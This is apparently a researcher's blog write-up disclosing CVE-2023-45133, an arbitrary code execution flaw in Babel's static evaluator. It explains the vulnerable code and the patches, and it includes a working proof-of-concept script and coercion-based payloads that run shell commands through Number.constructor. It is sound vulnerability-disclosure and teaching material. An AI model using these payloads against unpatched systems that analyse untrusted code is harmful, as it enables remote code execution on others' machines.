On October 10th, 2023, I stumbled upon an arbitrary code execution vulnerability in Babel, which was subsequently assigned the identifier CVE-2023-45133. In this post, I’ll walk you through the journey of discovering and exploiting this intriguing flaw.
This article was originally published on William Khem Marquez's blog. He also published a series on using Babel to deobfuscate JavaScript code: check it out!
Those who use Babel for reverse engineering and code deobfuscation love it for all of the built-in functionality it provides. One of the most useful features is the ability to statically evaluate expressions using path.evaluate() and path.evaluateTruthy(). I have written about this in the previous articles.
Wait, did I say statically evaluate?
The Exploit
Before delving into the details, let’s take a look at the proof of concept I came up with:
Proof of Concept
const parser = require("@babel/parser");
const traverse = require("@babel/traverse").default;

// Untrusted input: statically "evaluating" it is enough to run the payload.
const source = `String({ toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")});`;

const ast = parser.parse(source);

// Call path.evaluate() on every expression, the way a constant-folding pass might.
const evalVisitor = {
  Expression(path) {
    path.evaluate();
  },
};

traverse(ast, evalVisitor);
This simply outputs the result of the id command to the terminal, as can be seen below.
┌──(kali㉿kali)-[~/Babel RCE]
└─$ node exploit.js
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),111(bluetooth),115(scanner),138(wireshark),141(kaboxer),142(vboxsf)
Of course, the payload can be adapted to do anything, such as exfiltrating data or spawning a reverse shell.
Exploit Breakdown
To understand why this vulnerability works, we need to understand the source code of the culprit function, evaluate. The source code of babel-traverse/src/path/evaluation.ts prior to the fix is archived here:
/**
* Walk the input `node` and statically evaluate it.
*
* Returns an object in the form `{ confident, value, deopt }`. `confident`
* indicates whether or not we had to drop out of evaluating the expression
* because of hitting an unknown node that we couldn't confidently find the
* value of, in which case `deopt` is the path of said node.
*
* Example:
*
* t.evaluate(parse("5 + 5")) // { confident: true, value: 10 }
* t.evaluate(parse("!true")) // { confident: true, value: false }
* t.evaluate(parse("foo + foo")) // { confident: false, value: undefined, deopt: NodePath }
*
*/
export function evaluate(this: NodePath): {
confident: boolean;
value: any;
deopt?: NodePath;
} {
const state: State = {
confident: true,
deoptPath: null,
seen: new Map(),
};
let value = evaluateCached(this, state);
if (!state.confident) value = undefined;
return {
confident: state.confident,
deopt: state.deoptPath,
value: value,
};
}
When evaluate is called on a NodePath, it goes through the evaluateCached wrapper before reaching the _evaluate function, which does all the heavy lifting. The _evaluate function is where the vulnerability lies.
This function is responsible for recursively breaking down AST nodes until it reaches an atomic operation that can be evaluated confidently. The majority of the base cases are evaluated for atomic operations only (such as for binary expressions between two literals). However, there are a few exceptions to this rule.
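To make the recursion concrete, here is a minimal sketch of the same idea on hand-written, AST-like objects. It is not Babel's code: the node shapes only loosely mimic Babel's, `toyEvaluate` is a name I made up for illustration, and only two operators are handled.

```javascript
// Toy illustration only: NOT Babel's implementation.
// `toyEvaluate` and the hand-written node objects are hypothetical.
function toyEvaluate(node) {
  const state = { confident: true };

  function walk(n) {
    // Once confidence is lost, stop evaluating anything further.
    if (!state.confident) return undefined;
    switch (n.type) {
      case "NumericLiteral":
      case "StringLiteral":
        return n.value; // base case: a literal evaluates to itself
      case "BinaryExpression": {
        const left = walk(n.left);
        const right = walk(n.right);
        if (!state.confident) return undefined;
        if (n.operator === "+") return left + right;
        if (n.operator === "*") return left * right;
        break; // unsupported operator: fall through to the deopt below
      }
    }
    state.confident = false; // unknown node: give up ("deopt")
    return undefined;
  }

  const value = walk(node);
  return { confident: state.confident, value: state.confident ? value : undefined };
}

const five = { type: "NumericLiteral", value: 5 };
const foo = { type: "Identifier", name: "foo" };

const sum = toyEvaluate({ type: "BinaryExpression", operator: "+", left: five, right: five });
const unknown = toyEvaluate({ type: "BinaryExpression", operator: "+", left: foo, right: foo });

console.log(sum);
console.log(unknown);
```

The first call mirrors the `5 + 5` example from the doc comment above, while the second loses confidence as soon as it hits an identifier it knows nothing about.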
The two pieces of the source code we care about are the handling of call expressions and object expressions, as shown below:
Vulnerable Source Code
Relevant _evaluate source code
const VALID_OBJECT_CALLEES = ["Number", "String", "Math"] as const;
const VALID_IDENTIFIER_CALLEES = [
"isFinite",
"isNaN",
"parseFloat",
"parseInt",
"decodeURI",
"decodeURIComponent",
"encodeURI",
"encodeURIComponent",
process.env.BABEL_8_BREAKING ? "btoa" : null,
process.env.BABEL_8_BREAKING ? "atob" : null,
] as const;
const INVALID_METHODS = ["random"] as const;
function isValidObjectCallee(
val: string
): val is (typeof VALID_OBJECT_CALLEES)[number] {
return VALID_OBJECT_CALLEES.includes(
// @ts-expect-error val is a string
val
);
}
function isValidIdentifierCallee(
val: string
): val is (typeof VALID_IDENTIFIER_CALLEES)[number] {
return VALID_IDENTIFIER_CALLEES.includes(
// @ts-expect-error val is a string
val
);
}
function isInvalidMethod(val: string): val is (typeof INVALID_METHODS)[number] {
return INVALID_METHODS.includes(
// @ts-expect-error val is a string
val
);
}
function _evaluate(path: NodePath, state: State): any {
/** snip **/
if (path.isObjectExpression()) {
const obj = {};
const props = path.get("properties");
for (const prop of props) {
if (prop.isObjectMethod() || prop.isSpreadElement()) {
deopt(prop, state);
return;
}
const keyPath = (prop as NodePath<t.ObjectProperty>).get("key");
let key;
// @ts-expect-error todo(flow->ts): type refinement issues ObjectMethod and SpreadElement somehow not excluded
if (prop.node.computed) {
key = keyPath.evaluate();
if (!key.confident) {
deopt(key.deopt, state);
return;
}
key = key.value;
} else if (keyPath.isIdentifier()) {
key = keyPath.node.name;
} else {
key = (
keyPath.node as t.StringLiteral | t.NumericLiteral | t.BigIntLiteral
).value;
}
const valuePath = (prop as NodePath<t.ObjectProperty>).get("value");
let value = valuePath.evaluate();
if (!value.confident) {
deopt(value.deopt, state);
return;
}
value = value.value;
// @ts-expect-error key is any type
obj[key] = value;
}
return obj;
}
/** snip **/
if (path.isCallExpression()) {
const callee = path.get("callee");
let context;
let func;
// Number(1);
if (
callee.isIdentifier() &&
!path.scope.getBinding(callee.node.name) &&
(isValidObjectCallee(callee.node.name) ||
isValidIdentifierCallee(callee.node.name))
) {
func = global[callee.node.name];
}
if (callee.isMemberExpression()) {
const object = callee.get("object");
const property = callee.get("property");
// Math.min(1, 2)
if (
object.isIdentifier() &&
property.isIdentifier() &&
isValidObjectCallee(object.node.name) &&
!isInvalidMethod(property.node.name)
) {
context = global[object.node.name];
// @ts-expect-error property may not exist in context object
func = context[property.node.name];
}
// "abc".charCodeAt(4)
if (object.isLiteral() && property.isIdentifier()) {
// @ts-expect-error todo(flow->ts): consider checking ast node type instead of value type (StringLiteral and NumberLiteral)
const type = typeof object.node.value;
if (type === "string" || type === "number") {
// @ts-expect-error todo(flow->ts): consider checking ast node type instead of value type
context = object.node.value;
func = context[property.node.name];
}
}
}
if (func) {
const args = path
.get("arguments")
.map((arg) => evaluateCached(arg, state));
if (!state.confident) return;
return func.apply(context, args);
}
}
/** snip **/
}
Handling of Call Expressions
The first thing to understand is that while call expressions can indeed be evaluated, they are subject to a whitelist check, relying on the VALID_OBJECT_CALLEES or VALID_IDENTIFIER_CALLEES arrays.
Additionally, there are three cases for handling call expressions:
- When the callee is an identifier that is not shadowed by a binding in scope, and the identifier is whitelisted in VALID_OBJECT_CALLEES or VALID_IDENTIFIER_CALLEES.
- When the callee is a member expression, the object is an identifier, the identifier is whitelisted in VALID_OBJECT_CALLEES, and the property is not blacklisted in INVALID_METHODS.
- When the callee is a member expression, the object is a string or numeric literal, and the property is an identifier.
The most interesting one is the second case:
if (
  object.isIdentifier() &&
  property.isIdentifier() &&
  isValidObjectCallee(object.node.name) &&
  !isInvalidMethod(property.node.name)
) {
  context = global[object.node.name];
  // @ts-expect-error property may not exist in context object
  func = context[property.node.name];
}
/** snip **/
if (func) {
  const args = path.get("arguments").map((arg) => evaluateCached(arg, state));
  if (!state.confident) return;
  return func.apply(context, args);
}
The only blacklisted method is random, which is a method of the Math object. This means that any other method of the whitelisted Number, String, or Math objects can be directly referenced.
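The check can be boiled down to a few lines. The sketch below is a simplified re-creation that works on plain strings rather than AST nodes; `passesMemberCheck` is a hypothetical helper name, not something that exists in Babel.

```javascript
// Simplified re-creation of the member-call check quoted above.
// It operates on names only; Babel performs the same test on AST nodes.
const VALID_OBJECT_CALLEES = ["Number", "String", "Math"];
const INVALID_METHODS = ["random"];

// Hypothetical helper, for illustration only.
function passesMemberCheck(objectName, propertyName) {
  return (
    VALID_OBJECT_CALLEES.includes(objectName) &&
    !INVALID_METHODS.includes(propertyName)
  );
}

console.log(passesMemberCheck("Math", "max"));
console.log(passesMemberCheck("Math", "random"));
console.log(passesMemberCheck("Number", "constructor"));
console.log(passesMemberCheck("process", "exit"));
```

Note that the property name is only compared against the blacklist. Nothing verifies that it refers to a method the whitelisted object actually defines itself.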
In JavaScript, all classes are functions. Since Number and String are global JavaScript classes, their constructor property, which they inherit from Function.prototype, points to the Function constructor.
Therefore, the two expressions below are equivalent:
Number.constructor('javascript_code_here;');
Function('javascript_code_here;');
Passing in an arbitrary string to the Function constructor returns a function that will evaluate the provided string as JavaScript code when called.
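This is easy to confirm in a Node.js REPL. The snippet below is a harmless sketch: the function body just adds two numbers, and the variable names are mine.

```javascript
// Number and String are functions, so `constructor` resolves to Function
// through the prototype chain rather than being their own property.
const numberCtorIsFunction = Number.constructor === Function;
const stringCtorIsFunction = String.constructor === Function;
const ctorIsOwnProperty = Object.prototype.hasOwnProperty.call(Number, "constructor");

// Build a function from strings, exactly as Function("a", "b", "...") would.
const add = Number.constructor("a", "b", "return a + b;");

console.log(numberCtorIsFunction, stringCtorIsFunction, ctorIsOwnProperty);
console.log(typeof add);
console.log(add(2, 3));
```

Creating `add` does not run its body. The code inside the string only executes once the returned function is called.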
The AST node generated by Number.constructor('javascript_code_here;') contains:
- A call expression, where
  - The callee is a member expression, where
    - The object is an identifier, with name whitelisted by VALID_OBJECT_CALLEES
    - The property is an identifier, not blacklisted by INVALID_METHODS
  - The arguments are a single string literal, containing the code to be executed.
Therefore, the code is considered safe to evaluate, and we have successfully crafted a malicious function.
However, it is crucial to note that this cannot call the function on its own. It only creates an anonymous function.
So, how exactly can we call the function? This is where the second piece of the puzzle comes in: object expressions.
Handling of Object Expressions
Within Babel’s _evaluate method, an ObjectExpression node undergoes recursive evaluation, producing a true JavaScript object. There’s no limitation on key names for ObjectProperty. As long as every ObjectProperty child in the ObjectExpression yields confident: true from _evaluate(), we can obtain a JavaScript object with custom keys/values.
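As a rough sketch of that behaviour, the toy function below turns a hand-written ObjectExpression-like node into a real object. It is not Babel's code: `toyEvaluateObject` is a hypothetical name, and only literal values count as "confident" here.

```javascript
// Toy illustration only: NOT Babel's code. Node shapes are hand-written and
// `toyEvaluateObject` is a hypothetical name.
function toyEvaluateObject(node) {
  const obj = {};
  for (const prop of node.properties) {
    const valueNode = prop.value;
    // In this toy version, only literals are "confidently" known.
    if (valueNode.type !== "StringLiteral" && valueNode.type !== "NumericLiteral") {
      return { confident: false, value: undefined };
    }
    // No filtering on the key name: any identifier is accepted as a key.
    obj[prop.key.name] = valueNode.value;
  }
  return { confident: true, value: obj };
}

const objectNode = {
  type: "ObjectExpression",
  properties: [
    { key: { type: "Identifier", name: "answer" }, value: { type: "NumericLiteral", value: 42 } },
    { key: { type: "Identifier", name: "toString" }, value: { type: "StringLiteral", value: "placeholder" } },
  ],
};

const evaluatedObject = toyEvaluateObject(objectNode);
console.log(evaluatedObject.confident);
console.log(Object.keys(evaluatedObject.value));
```

The point is that a key such as toString ends up as an own property of a live object, shadowing the inherited Object.prototype.toString.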
A key property to leverage is toString (MDN Reference). Defining this property on an object to a function we control will allow us to execute arbitrary code when the object is converted to a string.
This is exactly what we do in the payload:
String(({ toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
We’ve assigned our malicious function, crafted via the Function constructor, to the toString property of the object. Thus, when this object undergoes a string conversion, it gets triggered and executed.
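The trigger itself can be reproduced without Babel. Here is a harmless stand-in for the payload, where the function only records that it ran; the names `calls` and `trapped` are mine.

```javascript
// Harmless stand-in for the payload: toString only records that it was invoked.
const calls = [];
const trapped = {
  toString() {
    calls.push("toString");
    return "converted";
  },
};

// String() performs a string conversion, which invokes trapped.toString().
const converted = String(trapped);

console.log(converted);
console.log(calls);
```

Swap the body of toString for a function built with the Function constructor and you have the shape of the exploit.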
In the provided example, we pass the object to the String function, given its status as a whitelisted function (referenced in case 1). Still, the String constructor isn’t mandatory. Implicit type coercion in JavaScript can also trigger our malicious function, as demonstrated in these alternative payload formats:
""+(({ toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
1+(({ valueOf: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
The first example employs type coercion to transform the object into a string. In contrast, the second example utilizes type coercion to convert it into a number, as detailed in Object.prototype.valueOf(). Both examples exploit the _evaluate() method’s approach to handling BinaryExpression nodes, which directly performs the operation after recursively evaluating the left and right operands.
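Both coercion paths can be observed in plain JavaScript. This is a benign sketch in which each hook simply logs its own name; the object and variable names are made up for illustration.

```javascript
// Benign demonstration of the two coercion hooks used by the alternative payloads.
const log = [];

const viaToString = {
  toString() {
    log.push("toString");
    return "str";
  },
};

const viaValueOf = {
  valueOf() {
    log.push("valueOf");
    return 41;
  },
};

// The inherited valueOf returns the object itself (not a primitive),
// so `+` falls back to our toString.
const concatenated = "" + viaToString;

// Our valueOf returns a primitive number, so `+` uses it directly.
const summed = 1 + viaValueOf;

console.log(concatenated, summed, log);
```

Neither line contains a call expression, which is why the whitelist on callees offers no protection here.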
The Patch
Upon disclosing this vulnerability, I was impressed by the swift response from the Babel team, who promptly rolled out a patch. This patch was released in two parts:
The first was a workaround for all of the affected official Babel packages, guarding the calls to evaluate() with an isPure() check. isPure() inherently prevents this bug, as it returns false for all MemberExpression nodes. PR #16032: Update babel-polyfills packages
The subsequent step involved refining the evaluate() function. This adjustment ensured that all inherited methods, not only constructor, were prevented from being called. PR #16033: Only evaluate own String/Number/Math methods
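The idea behind the second fix can be sketched as an own-property check. The snippet below is my own illustration of that idea, not the code from the PR: `resolveOwnMethod` is a hypothetical helper, and the INVALID_METHODS blacklist is left out for brevity.

```javascript
// Sketch of the "own methods only" idea; NOT the actual patch.
const VALID_OBJECT_CALLEES = ["Number", "String", "Math"];

// Hypothetical helper: returns the method only if the whitelisted global
// defines it directly, rather than inheriting it through the prototype chain.
function resolveOwnMethod(objectName, propertyName) {
  if (!VALID_OBJECT_CALLEES.includes(objectName)) return undefined;
  const context = globalThis[objectName];
  if (!Object.prototype.hasOwnProperty.call(context, propertyName)) return undefined;
  const candidate = context[propertyName];
  return typeof candidate === "function" ? candidate : undefined;
}

console.log(resolveOwnMethod("Math", "max") === Math.max);
console.log(resolveOwnMethod("String", "fromCharCode") === String.fromCharCode);
console.log(resolveOwnMethod("Number", "constructor"));
console.log(resolveOwnMethod("String", "toString"));
```

Because constructor lives on Function.prototype rather than on Number or String themselves, a check like this rejects it along with every other inherited method.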
After the fixes were implemented, GitHub staff issued CVE-2023-45133 for the security advisory.
A side note on disclosure timing
You might have noticed that this blog post was released on the same day as the security advisory. Usually for critical vulnerabilities, it’s customary to wait a while before disclosing a proof of concept. However, I believe this disclosure timing is justifiable for a few reasons:
Predominantly, the vast majority of Babel users remain unaffected by this vulnerability. Babel is primarily utilized for refactoring and transpiling one’s own code, which means the typical use case doesn’t expose users to this risk. It’s improbable that many have server-side implementations that accept and process arbitrary code from users through the compilation plugins or the invocation of path.evaluate. Furthermore, there are really only a couple of real use cases for using Babel to analyze untrusted code on the server side:
- Reverse engineering bot mitigation software, etc.
- Malware analysis
In the first case, I doubt any legitimate bot mitigation entity would try to attempt Remote Code Execution (RCE) due to the legal ramifications. Meanwhile, professionals using Babel for malware reversal possess the expertise to conduct their analyses within controlled, sandboxed environments. Thus, the risk to the community, in real-world scenarios, remains minimal.
Conclusion
Discovering and delving into this vulnerability was a fun experience. I initially stumbled upon the vulnerability during a brainstorming session for a Babel-based challenge for UofTCTF’s upcoming capture the flag competition, where I was focusing on an entirely different, non-security-related “bug”.
This vulnerability predominantly impacts those integrating untrusted code with Babel. Unfortunately, this places individuals leveraging Babel for “static deobfuscation” directly in the crosshairs of this attack vector.
There’s a touch of irony in the fact that my first credited CVE emerged from reverse engineering Babel - the very tool I often employ for reverse engineering JavaScript, and the topic of all of my previous posts 🤣.
This was a great learning experience, and hopefully this write-up was useful to you as well. Thanks for reading, and take care!